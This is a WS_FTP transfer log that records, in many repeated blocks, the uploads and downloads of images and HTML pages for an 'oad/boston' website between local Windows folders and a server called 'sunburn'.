10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:47 B C:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:47 B C:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:47 B C:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\boston.htm <-- sunburn /oad/incoming/lorenzo/boston boston.html
10.1.1.233 10:28 B C:\OADWEB~1\BOSTON\index.htm <-- sunburn /oad/incoming/lorenzo/boston index.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\blondbkgB.jpeg --> sunburn /oad/incoming/lorenzo/boston blondbkgB.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\boston.htm --> sunburn /oad/incoming/lorenzo/boston boston.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\choices.html --> sunburn /oad/incoming/lorenzo/boston choices.html
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\concbkg.jpeg --> sunburn /oad/incoming/lorenzo/boston concbkg.jpeg
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\index.htm --> sunburn /oad/incoming/lorenzo/boston index.htm
10.1.1.233 08:34 B C:\Oad Web Stuff\BOSTON\water5.jpg --> sunburn /oad/incoming/lorenzo/boston water5.jpg
10.1.1.231 13:47 B c:\web\boston\ws_ftp.log <-- SunSite UNC /web/home/root/oad/boston ws_ftp.log
10.1.1.231 14:08 B c:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:08 B c:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:08 B c:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
10.1.1.231 14:08 B c:\web\boston\boston.html --> sunburn /web/home/root/oad/boston boston.html
10.1.1.231 14:08 B c:\web\boston\choices.html --> sunburn /web/home/root/oad/boston choices.html
10.1.1.231 14:08 B c:\web\boston\concbkg.jpeg --> sunburn /web/home/root/oad/boston concbkg.jpeg
10.1.1.231 14:08 B c:\web\boston\gtrhedsm.gif --> sunburn /web/home/root/oad/boston gtrhedsm.gif
10.1.1.231 14:08 B c:\web\boston\index.html --> sunburn /web/home/root/oad/boston index.html
10.1.1.231 14:08 B c:\web\boston\mars7.jpg --> sunburn /web/home/root/oad/boston mars7.jpg
10.1.1.231 14:08 B c:\web\boston\oadal1p2.gif --> sunburn /web/home/root/oad/boston oadal1p2.gif
10.1.1.231 14:08 B c:\web\boston\oadal3p1.jpg --> sunburn /web/home/root/oad/boston oadal3p1.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p2.jpg --> sunburn /web/home/root/oad/boston oadal3p2.jpg
10.1.1.231 14:08 B c:\web\boston\oadal3p3.jpg --> sunburn /web/home/root/oad/boston oadal3p3.jpg
10.1.1.231 14:08 B c:\web\boston\palmtreeicon.jpg --> sunburn /web/home/root/oad/boston palmtreeicon.jpg
10.1.1.231 14:08 B c:\web\boston\peoplenew.JPG --> sunburn /web/home/root/oad/boston peoplenew.JPG
10.1.1.231 14:08 B c:\web\boston\rsd2.gif --> sunburn /web/home/root/oad/boston rsd2.gif
10.1.1.231 14:08 B c:\web\boston\sidewavy.gif --> sunburn /web/home/root/oad/boston sidewavy.gif
10.1.1.231 14:08 B c:\web\boston\smallogo.gif --> sunburn /web/home/root/oad/boston smallogo.gif
10.1.1.231 14:08 B c:\web\boston\teapotglow.jpg --> sunburn /web/home/root/oad/boston teapotglow.jpg
10.1.1.231 14:08 B c:\web\boston\water5.jpg --> sunburn /web/home/root/oad/boston water5.jpg
10.1.1.231 14:08 B c:\web\boston\WS_FTP.LOG --> sunburn /web/home/root/oad/boston WS_FTP.LOG
10.1.1.231 14:47 B C:\web\boston\bball.gif --> sunburn /web/home/root/oad/boston bball.gif
10.1.1.231 14:47 B C:\web\boston\blondbkgB.jpeg --> sunburn /web/home/root/oad/boston blondbkgB.jpeg
10.1.1.231 14:47 B C:\web\boston\boston.htm --> sunburn /web/home/root/oad/boston boston.htm
